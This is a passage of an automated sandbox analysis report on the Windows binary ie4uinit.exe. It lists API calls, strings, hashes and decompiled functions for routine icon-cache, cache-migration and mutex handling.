Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #701
String ID:
API String ID: 1014962704-0
Opcode ID: 4ee29c3f97c311be22214ef5afee397f70503d7d1c846a1b8ffb3b5e5e9f990c
Instruction ID: f2e4133e5657079e37ad65a777f4277c67ded66134cbdbc6cd58971904b7bf63
Opcode Fuzzy Hash: 4ee29c3f97c311be22214ef5afee397f70503d7d1c846a1b8ffb3b5e5e9f990c
Instruction Fuzzy Hash: 33E07565F0F683B2F708A72AAC50326A7916FC878DFC44034D44AAB258DEADE4419720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C6930 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

#655.IERTUTIL ref: 00007FF7319C6964

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #655
String ID:
API String ID: 1202143355-0
Opcode ID: ffc094cae51bb6d9c7fd23f890016d908ab2f0a820d5672fdd2ac3c749448eee
Instruction ID: f34b90113fa4344ac6ef148a783889f37371c60456c1dfdc50bc9f15fb94ef7a
Opcode Fuzzy Hash: ffc094cae51bb6d9c7fd23f890016d908ab2f0a820d5672fdd2ac3c749448eee
Instruction Fuzzy Hash: 65E08CB2D142848AE310AB18E848389B7B0F794778FD01320D2F9027E5CBBE91A58F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E35F0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

__wgetmainargs.KERNELBASE ref: 00007FF7319E3628

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: __wgetmainargs
String ID:
API String ID: 1709950718-0
Opcode ID: 89d07be83c3f390e7707a018dc140ed67188c345eb38bfe0268f0bd6a2015586
Instruction ID: 377314d8308c18c13d05cdb4cb581e85e8c2c5338d874dd81836280a574e8390
Opcode Fuzzy Hash: 89d07be83c3f390e7707a018dc140ed67188c345eb38bfe0268f0bd6a2015586
Instruction Fuzzy Hash: 4AE05278E0E683F6EB10AF60F8404A0B7A0BB1431EFC00132C51C53238DEBCA199EB24

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7319E0A8C Relevance: 89.4, APIs: 26, Strings: 25, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7319E0AC2
_wcsicmp.MSVCRT ref: 00007FF7319E0AE7
_wcsicmp.MSVCRT ref: 00007FF7319E0B03

Strings

Te.ProcessHost.exe, xrefs: 00007FF7319E0BB7
LOADER42.EXE, xrefs: 00007FF7319E0B4D
pickerhost.exe, xrefs: 00007FF7319E0CF9
MSHTMPAD.EXE, xrefs: 00007FF7319E0C33
WWAHOST.EXE, xrefs: 00007FF7319E0B69
msvsmon.exe, xrefs: 00007FF7319E0D12
EXPLORER.EXE, xrefs: 00007FF7319E0B31
NETPLWIZ.EXE, xrefs: 00007FF7319E0BFB
TE.EXE, xrefs: 00007FF7319E0BA3
FirstLogonAnim.exe, xrefs: 00007FF7319E0C4F
MSOOBE.EXE, xrefs: 00007FF7319E0BDF
IEXPLORE.EXE, xrefs: 00007FF7319E0ADA
USERACCOUNTBROKER.EXE, xrefs: 00007FF7319E0C17
microsoftedge.exe, xrefs: 00007FF7319E0CA6
SYSPREP.EXE, xrefs: 00007FF7319E0B15
IEUTLAUNCH.EXE, xrefs: 00007FF7319E0B85
jshost.exe, xrefs: 00007FF7319E0D44
MSFEEDSSYNC.EXE, xrefs: 00007FF7319E0AF9
authhost.exe, xrefs: 00007FF7319E0D5D
RESTOREOPTIN.EXE, xrefs: 00007FF7319E0C6B
DCIScanner, xrefs: 00007FF7319E0C87
microsoftedgecp.exe, xrefs: 00007FF7319E0CC2
FAKEVIRTUALSURFACETESTAPP.EXE, xrefs: 00007FF7319E0BCB
browser_broker.exe, xrefs: 00007FF7319E0D2B
microsoftedgesh.exe, xrefs: 00007FF7319E0CDE

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: _wcsicmp$FileModuleName
String ID: DCIScanner$EXPLORER.EXE$FAKEVIRTUALSURFACETESTAPP.EXE$FirstLogonAnim.exe$IEUTLAUNCH.EXE$IEXPLORE.EXE$LOADER42.EXE$MSFEEDSSYNC.EXE$MSHTMPAD.EXE$MSOOBE.EXE$NETPLWIZ.EXE$RESTOREOPTIN.EXE$SYSPREP.EXE$TE.EXE$Te.ProcessHost.exe$USERACCOUNTBROKER.EXE$WWAHOST.EXE$authhost.exe$browser_broker.exe$jshost.exe$microsoftedge.exe$microsoftedgecp.exe$microsoftedgesh.exe$msvsmon.exe$pickerhost.exe
API String ID: 1034258996-314592976
Opcode ID: dd52f77a89a8c24116ce5e93daae8bbd4a0d6a86083c7a9e704fefb9976d721b
Instruction ID: d754a84ce1d5906b1b482e829f583a5781befa1fbdadd967eb01cecf4266c237
Opcode Fuzzy Hash: dd52f77a89a8c24116ce5e93daae8bbd4a0d6a86083c7a9e704fefb9976d721b
Instruction Fuzzy Hash: 6B919A60F0C6C3A5FB54AB15E850279A3A1AF54B48FC9D439C44E46198EFEEF558E330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C3D20 Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 293fileregistrystringCOMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNEL32 ref: 00007FF7319C3D69
GetShortPathNameW.KERNEL32 ref: 00007FF7319C3DB5
PathFindFileNameW.SHLWAPI ref: 00007FF7319C3DC7

Part of subcall function 00007FF7319C90F4: LocalFree.KERNEL32 ref: 00007FF7319C9312

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C3DF4
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C3E05
FindFirstFileW.KERNEL32 ref: 00007FF7319C3E1F
CoCreateInstance.OLE32 ref: 00007FF7319C3E55
StrCmpIW.SHLWAPI ref: 00007FF7319C3EE3
StrCmpIW.SHLWAPI ref: 00007FF7319C3F0A
PathRemoveBlanksW.SHLWAPI ref: 00007FF7319C3F42
StrCmpICW.SHLWAPI ref: 00007FF7319C3F61
StrCmpICW.SHLWAPI ref: 00007FF7319C3F79
ILCreateFromPath.SHELL32 ref: 00007FF7319C3FC3
ILCreateFromPath.SHELL32 ref: 00007FF7319C3FFB
RegOpenKeyExW.ADVAPI32 ref: 00007FF7319C4042
StrCmpIW.SHLWAPI ref: 00007FF7319C408A
RegCloseKey.ADVAPI32 ref: 00007FF7319C40A5
ILFree.SHELL32 ref: 00007FF7319C40B0
FindNextFileW.KERNEL32 ref: 00007FF7319C40C3
FindClose.KERNEL32 ref: 00007FF7319C40F8
FindFirstFileExW.KERNEL32 ref: 00007FF7319C4159
lstrcmpW.KERNEL32 ref: 00007FF7319C4177

Part of subcall function 00007FF7319C894C: wcschr.MSVCRT ref: 00007FF7319C89B4

lstrcmpW.KERNEL32 ref: 00007FF7319C418C
FindNextFileW.KERNEL32 ref: 00007FF7319C41FC
FindClose.KERNEL32 ref: 00007FF7319C420D
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C421A

Strings

IEXPLORE.EXE, xrefs: 00007FF7319C4083
-nohome, xrefs: 00007FF7319C3F53
shell:::{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF7319C3FBC
*.lnk, xrefs: 00007FF7319C3E18
-extoff, xrefs: 00007FF7319C3F6B
shell:::{2559a1f4-21d7-11d4-bdaf-00c04f60b9f0}, xrefs: 00007FF7319C3FF4
Software\Clients\StartMenuInternet, xrefs: 00007FF7319C4034

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Find$Path$File$CloseCreateCurrentDirectoryName$FirstFreeFromNextShortlstrcmp$BlanksInstanceLocalOpenRemovewcschr
String ID: *.lnk$-extoff$-nohome$IEXPLORE.EXE$Software\Clients\StartMenuInternet$shell:::{2559a1f4-21d7-11d4-bdaf-00c04f60b9f0}$shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
API String ID: 1000041407-3405740670
Opcode ID: 5d23bd38dd012cebc5d80024e9f86e5bf59b1457f7b608da9a8fcce831279e11
Instruction ID: 2f643a5b951774ed0e08f537aaf73b142c6742701b51a869df5a0338fb3bbbd5
Opcode Fuzzy Hash: 5d23bd38dd012cebc5d80024e9f86e5bf59b1457f7b608da9a8fcce831279e11
Instruction Fuzzy Hash: D4E12261F08AC3A5EB10EF25D8801E9A360FB48B9CFC04135DA8E4769CDFACE645D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C26F0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 130
sleeplibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E00007FF77FF7319C26F0(long long __rbx, void* __r8, long long _a8) {
				signed int _v24;
				char _v552;
				long long _v568;
				long long _v584;
				void* __rdi;
				long _t18;
				void* _t21;
				int _t27;
				void* _t31;
				long _t35;
				void* _t53;
				signed long long _t69;
				signed long long _t70;
				long long _t94;
				void* _t95;
				void* _t96;
				void* _t103;
				void* _t106;

				_a8 = __rbx;
				_t69 =  *0x319f4658; // 0x8be7dd1f02a
				_t70 = _t69 ^ _t96 - 0x00000260;
				_v24 = _t70;
				E00007FF77FF7319C5974(0x319f4348, L"In CmdClearIconCache\n", __r8, _t103);
				r9d = 0;
				r8d = 0;
				__imp__InitOnceExecuteOnce();
				if ( *0x319f4ca0 != 2) goto 0x319c27b4;
				if ( *0x319f4c94 != 6) goto 0x319c27b4;
				if ( *0x319f4c98 != 1) goto 0x319c27b4;
				_t35 = GetTickCount();
				__imp__GetShellWindow();
				if (_t70 != 0) goto 0x319c2796;
				_t18 = GetTickCount();
				if (_t18 - _t35 < 0) goto 0x319c2781;
				if (_t18 - _t35 - 0x493e0 > 0) goto 0x319c27b4;
				goto 0x319c2789;
				GetTickCount();
				Sleep(??);
				goto 0x319c2761;
				Sleep(??);
				r9d = 0;
				r8d = 0;
				SHChangeNotify(??, ??, ??, ??);
				_t21 = E00007FF77FF7319C5974(0x319f4348, L"In MigrateWinInetCache\n", __r8, _t103);
				__imp__CoInitializeEx();
				if (_t21 < 0) goto 0x319c2888;
				_v568 = _t94;
				__imp__SHGetKnownFolderPath();
				if (_t21 < 0) goto 0x319c2882;
				if (E00007FF77FF7319C90F4(_t53,  &_v552, L"In MigrateWinInetCache\n", _v568, L"migration\\WininetPlugin.dll", _t106) < 0) goto 0x319c2877;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t70 == 0) goto 0x319c2877;
				GetProcAddress(??, ??);
				if (_t70 == 0) goto 0x319c286e;
				r8d =  *0x319e7038();
				E00007FF77FF7319C5974(0x319f4348, L"MigrateCacheForCurrentUser() returned: 0x%1!08lX!\n", _v568, L"migration\\WininetPlugin.dll");
				_t27 = FreeLibrary(??);
				__imp__CoTaskMemFree();
				__imp__CoUninitialize();
				E00007FF77FF7319C5674(_t27, L"MigrateCacheForCurrentUser() returned: 0x%1!08lX!\n");
				goto 0x319c289a;
				Sleep(??);
				__imp__GetShellWindow();
				if (_t70 == 0) goto 0x319c288f;
				r9b = 1;
				r8b = r9b;
				E00007FF77FF7319CA568(_t53, _t70, 0x319f4260, L"MigrateCacheForCurrentUser() returned: 0x%1!08lX!\n", _t94, _t95, L"migration\\WininetPlugin.dll");
				E00007FF77FF7319CA854(0x1388, 1, _t53, _t70, _t70, L"MigrateCacheForCurrentUser() returned: 0x%1!08lX!\n", _t94, _t95, _v568, L"migration\\WininetPlugin.dll", _t106);
				_t31 = E00007FF77FF7319C6638();
				if (_t31 == 0) goto 0x319c2905;
				r9d = 0;
				_v552 = 0;
				r8d = 0;
				_v584 =  &_v552;
				__imp__SHGetFolderPathW();
				if (_t31 < 0) goto 0x319c2905;
				r9d = 3;
				E00007FF77FF7319CAC08(1, 0,  &_v552, L"MigrateCacheForCurrentUser() returned: 0x%1!08lX!\n", 0x319f4000);
				return E00007FF77FF7319E38D0(0, 0, _v24 ^ _t96 - 0x00000260);
			}

0x7ff7319c26f0
0x7ff7319c26fd
0x7ff7319c2704
0x7ff7319c2707
0x7ff7319c271d
0x7ff7319c2722
0x7ff7319c272c
0x7ff7319c2736
0x7ff7319c2745
0x7ff7319c274e
0x7ff7319c2757
0x7ff7319c275f
0x7ff7319c2761
0x7ff7319c276a
0x7ff7319c276c
0x7ff7319c2774
0x7ff7319c277d
0x7ff7319c277f
0x7ff7319c2781
0x7ff7319c278e
0x7ff7319c2794
0x7ff7319c279b
0x7ff7319c27a1
0x7ff7319c27a4
0x7ff7319c27ae
0x7ff7319c27c2
0x7ff7319c27ce
0x7ff7319c27d6
0x7ff7319c27e1
0x7ff7319c27f3
0x7ff7319c27fb
0x7ff7319c281e
0x7ff7319c2820
0x7ff7319c282a
0x7ff7319c2836
0x7ff7319c2842
0x7ff7319c284b
0x7ff7319c2858
0x7ff7319c2869
0x7ff7319c2871
0x7ff7319c287c
0x7ff7319c2882
0x7ff7319c2888
0x7ff7319c288d
0x7ff7319c2894
0x7ff7319c289a
0x7ff7319c28a3
0x7ff7319c28a5
0x7ff7319c28af
0x7ff7319c28b2
0x7ff7319c28b9
0x7ff7319c28be
0x7ff7319c28c5
0x7ff7319c28c7
0x7ff7319c28ca
0x7ff7319c28d4
0x7ff7319c28d9
0x7ff7319c28e2
0x7ff7319c28ea
0x7ff7319c28ec
0x7ff7319c2900
0x7ff7319c2927

APIs

Part of subcall function 00007FF7319C5974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C59AD
Part of subcall function 00007FF7319C5974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C5A1F
Part of subcall function 00007FF7319C5974: PostThreadMessageW.USER32 ref: 00007FF7319C5A39

InitOnceExecuteOnce.KERNEL32 ref: 00007FF7319C2736
GetTickCount.KERNEL32 ref: 00007FF7319C2759
GetShellWindow.USER32 ref: 00007FF7319C2761
GetTickCount.KERNEL32 ref: 00007FF7319C276C
GetTickCount.KERNEL32 ref: 00007FF7319C2781
Sleep.KERNEL32 ref: 00007FF7319C278E
Sleep.KERNEL32 ref: 00007FF7319C279B
SHChangeNotify.SHELL32 ref: 00007FF7319C27AE
CoInitializeEx.OLE32 ref: 00007FF7319C27CE
SHGetKnownFolderPath.SHELL32 ref: 00007FF7319C27F3
LoadLibraryExW.KERNEL32 ref: 00007FF7319C282A
GetProcAddress.KERNEL32 ref: 00007FF7319C2842
FreeLibrary.KERNEL32 ref: 00007FF7319C2871
CoTaskMemFree.OLE32 ref: 00007FF7319C287C
CoUninitialize.OLE32 ref: 00007FF7319C2882
Sleep.KERNEL32 ref: 00007FF7319C2894
GetShellWindow.USER32 ref: 00007FF7319C289A
SHGetFolderPathW.SHELL32 ref: 00007FF7319C28E2

Strings

MigrateCacheForCurrentUser() returned: 0x%1!08lX!, xrefs: 00007FF7319C285B
MigrateCacheForCurrentUser, xrefs: 00007FF7319C2838
migration\WininetPlugin.dll, xrefs: 00007FF7319C2806
In CmdClearIconCache, xrefs: 00007FF7319C270F
In MigrateWinInetCache, xrefs: 00007FF7319C27B4

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CountSleepTick$FolderFreeLibraryMessageOncePathShellWindow$AddressChangeExecuteFormatInitInitializeKnownLoadLocalNotifyPostProcTaskThreadTimeUninitialize
String ID: In CmdClearIconCache$In MigrateWinInetCache$MigrateCacheForCurrentUser$MigrateCacheForCurrentUser() returned: 0x%1!08lX!$migration\WininetPlugin.dll
API String ID: 2252748604-3922426855
Opcode ID: 8f3cb346c4404a8073ba28e5e7f7c9c0dd470a14ec71d8edd724a6ad5eb143ee
Instruction ID: ad709e5737f47b0fc31e486aa0cdd0c86852365fac11eefd46c4f3f5fa7aa74f
Opcode Fuzzy Hash: 8f3cb346c4404a8073ba28e5e7f7c9c0dd470a14ec71d8edd724a6ad5eb143ee
Instruction Fuzzy Hash: 7A513E20E1CAC3B2FB10BB20E8546B9A360BF4974DFC05135D58D466ADDEADE504EB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C9604 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 218
synchronizationCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00007FF77FF7319C9604(long long __rbx, long long __rcx, signed long long* __rdx, void* __r9) {
				void* __rsi;
				long _t25;
				signed int _t29;
				long _t30;
				long _t34;
				void* _t38;
				signed long long _t67;
				signed long long _t68;
				signed long long _t72;
				void* _t91;
				long _t93;
				signed long long _t95;
				int _t97;
				void* _t100;
				signed long long _t101;
				void* _t109;
				void* _t110;
				void* _t113;

				 *((long long*)(_t100 + 0x18)) = __rbx;
				_t2 = _t100 - 0x160; // -148
				_t101 = _t100 - 0x260;
				_t67 =  *0x319f4658; // 0x8be7dd1f02a
				_t68 = _t67 ^ _t101;
				 *(_t2 + 0x150) = _t68;
				 *__rdx =  *__rdx & 0x00000000;
				_t25 = GetCurrentProcessId();
				 *((long long*)(_t101 + 0x28)) = __rcx;
				r9d = _t25;
				 *((intOrPtr*)(_t101 + 0x20)) = 0x78;
				_t6 = _t101 + 0x40; // 0x16c
				E00007FF77FF7319C1394(_t25, _t6, __rdx, L"Local\\SM0:%d:%d:%hs", __r9, _t113);
				r9d = 0x1f0001;
				r8d = 0;
				__imp__CreateMutexExW();
				 *(_t101 + 0x30) = _t68;
				_t72 = _t68;
				if (_t68 != 0) goto 0x319c96af;
				E00007FF77FF7319C7700();
				if (_t72 == 0) goto 0x319c97b2;
				if (CloseHandle(_t110) == 0) goto 0x319c97da;
				goto 0x319c97b2;
				r8d = 0;
				_t29 = WaitForSingleObjectEx(_t91, _t93, _t97);
				if (_t29 == 0x102) goto 0x319c96d4;
				if (_t29 == 0) goto 0x319c96e0;
				if (_t29 != 0x80) goto 0x319c97ec;
				if ((_t29 & 0xffffff7f) == 0) goto 0x319c96e0;
				r14d = 0;
				goto 0x319c96e3;
				 *(_t101 + 0x38) =  *(_t101 + 0x38) & _t93;
				_t30 = E00007FF77FF7319C9DB0(_t29 & 0xffffff7f, _t72, _t101 + 0x40, _t101 + 0x38, _t93, _t109);
				if (_t30 >= 0) goto 0x319c971a;
				r9d = _t30;
				E00007FF77FF7319C7CCC();
				goto 0x319c9725;
				_t95 =  *(_t101 + 0x38) << 2;
				if (0 >= 0) goto 0x319c9746;
				r9d = 0;
				E00007FF77FF7319C7CCC();
				goto 0x319c975e;
				if (_t95 == 0) goto 0x319c977d;
				 *__rdx = _t95;
				 *( *__rdx) =  *_t95 + 1;
				if (_t72 == 0) goto 0x319c9690;
				if (ReleaseMutex(??) == 0) goto 0x319c9805;
				goto 0x319c9690;
				_t34 = E00007FF77FF7319C9A98(_t38, 0,  *(_t101 + 0x30), _t101 + 0x40, _t101 + 0x30, _t95, __rdx, _t109);
				if (_t34 >= 0) goto 0x319c9757;
				r9d = _t34;
				E00007FF77FF7319C7CCC();
				goto 0x319c9759;
				return E00007FF77FF7319E38D0(_t34,  *_t95 + 1,  *(_t2 + 0x150) ^ _t101);
			}

0x7ff7319c9604
0x7ff7319c9610
0x7ff7319c9618
0x7ff7319c961f
0x7ff7319c9626
0x7ff7319c9629
0x7ff7319c9630
0x7ff7319c963a
0x7ff7319c9640
0x7ff7319c964c
0x7ff7319c964f
0x7ff7319c965c
0x7ff7319c9661
0x7ff7319c9666
0x7ff7319c9671
0x7ff7319c9676
0x7ff7319c967c
0x7ff7319c9681
0x7ff7319c9687
0x7ff7319c9689
0x7ff7319c9693
0x7ff7319c96a4
0x7ff7319c96aa
0x7ff7319c96af
0x7ff7319c96b8
0x7ff7319c96c3
0x7ff7319c96c7
0x7ff7319c96ce
0x7ff7319c96d9
0x7ff7319c96db
0x7ff7319c96de
0x7ff7319c96ea
0x7ff7319c96f4
0x7ff7319c96fd
0x7ff7319c970d
0x7ff7319c9713
0x7ff7319c9718
0x7ff7319c971f
0x7ff7319c9727
0x7ff7319c9737
0x7ff7319c973f
0x7ff7319c9744
0x7ff7319c9749
0x7ff7319c974b
0x7ff7319c9755
0x7ff7319c9761
0x7ff7319c9772
0x7ff7319c9778
0x7ff7319c978a
0x7ff7319c9793
0x7ff7319c97a3
0x7ff7319c97ab
0x7ff7319c97b0
0x7ff7319c97d9

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7319C963A

Part of subcall function 00007FF7319C1394: _vsnwprintf.MSVCRT ref: 00007FF7319C13D4

CreateMutexExW.KERNEL32 ref: 00007FF7319C9676
CloseHandle.KERNEL32 ref: 00007FF7319C969C
WaitForSingleObjectEx.KERNEL32 ref: 00007FF7319C96B8
ReleaseMutex.KERNEL32 ref: 00007FF7319C976A

Part of subcall function 00007FF7319C7700: GetLastError.KERNEL32 ref: 00007FF7319C7704

Strings

wil, xrefs: 00007FF7319C9706, 00007FF7319C9730, 00007FF7319C979C, 00007FF7319C9AFE
Local\SM0:%d:%d:%hs, xrefs: 00007FF7319C9645
internal\sdk\inc\wil\resource.h, xrefs: 00007FF7319C97F3
x, xrefs: 00007FF7319C964F

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Mutex$CloseCreateCurrentErrorHandleLastObjectProcessReleaseSingleWait_vsnwprintf
String ID: Local\SM0:%d:%d:%hs$internal\sdk\inc\wil\resource.h$wil$x
API String ID: 226711808-1706092632
Opcode ID: 65f9df8c3f67b3a05606eb12edd970345bbcf4e320ce94b9f7abb7beabd13ff8
Instruction ID: d8d5f854a680dc7a0db478b29e4385c2ec23f2f8a0c69a257cf513d3dff88b4f
Opcode Fuzzy Hash: 65f9df8c3f67b3a05606eb12edd970345bbcf4e320ce94b9f7abb7beabd13ff8
Instruction Fuzzy Hash: 12917231E0C6C3A2FB64BF25D8443B9A3A4AF44B98F844035D9CE47699DEACE445DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D6478 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 501COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319E16EC: CoCreateInstance.OLE32(?,?,00000000,80004005,?,00007FF7319D64BB), ref: 00007FF7319E178A
Part of subcall function 00007FF7319E16EC: SysAllocString.OLEAUT32 ref: 00007FF7319E17CA

Part of subcall function 00007FF7319D5BE8: SysFreeString.OLEAUT32 ref: 00007FF7319D5C6C

SysFreeString.OLEAUT32 ref: 00007FF7319D6507
StrCmpNW.SHLWAPI ref: 00007FF7319D6573

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

SysFreeString.OLEAUT32 ref: 00007FF7319D671F
SysFreeString.OLEAUT32 ref: 00007FF7319D6823
SysStringLen.OLEAUT32 ref: 00007FF7319D6833
SysStringLen.OLEAUT32 ref: 00007FF7319D686E
SysFreeString.OLEAUT32 ref: 00007FF7319D68AB
SysFreeString.OLEAUT32 ref: 00007FF7319D6A06
SysStringLen.OLEAUT32 ref: 00007FF7319D6A58
SysFreeString.OLEAUT32 ref: 00007FF7319D6A67
SysFreeString.OLEAUT32 ref: 00007FF7319D6ADB
SysFreeString.OLEAUT32 ref: 00007FF7319D6B12
SysFreeString.OLEAUT32 ref: 00007FF7319D6B4D

Strings

publiccertificate, xrefs: 00007FF7319D658A
NOTFOUND, xrefs: 00007FF7319D6B23
signvalue, xrefs: 00007FF7319D69C4
status, xrefs: 00007FF7319D64C5
thumbprint, xrefs: 00007FF7319D66DD

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$AllocCreateHeapInstanceProcess
String ID: NOTFOUND$publiccertificate$signvalue$status$thumbprint
API String ID: 3573149549-479019699
Opcode ID: b91c80a8bbe3a35f467edd1b762041284d9f9c077ea92dcf7737e05f05ced47a
Instruction ID: bc963dc011a51f0a9d08b82e0c7e707042546e1f4672501bdd4036f26a8de1fc
Opcode Fuzzy Hash: b91c80a8bbe3a35f467edd1b762041284d9f9c077ea92dcf7737e05f05ced47a
Instruction Fuzzy Hash: 2A32172AF09B86A6EF14EF66D59417CA760FF44F98B858436CE0D27768CE78E404D360

Uniqueness

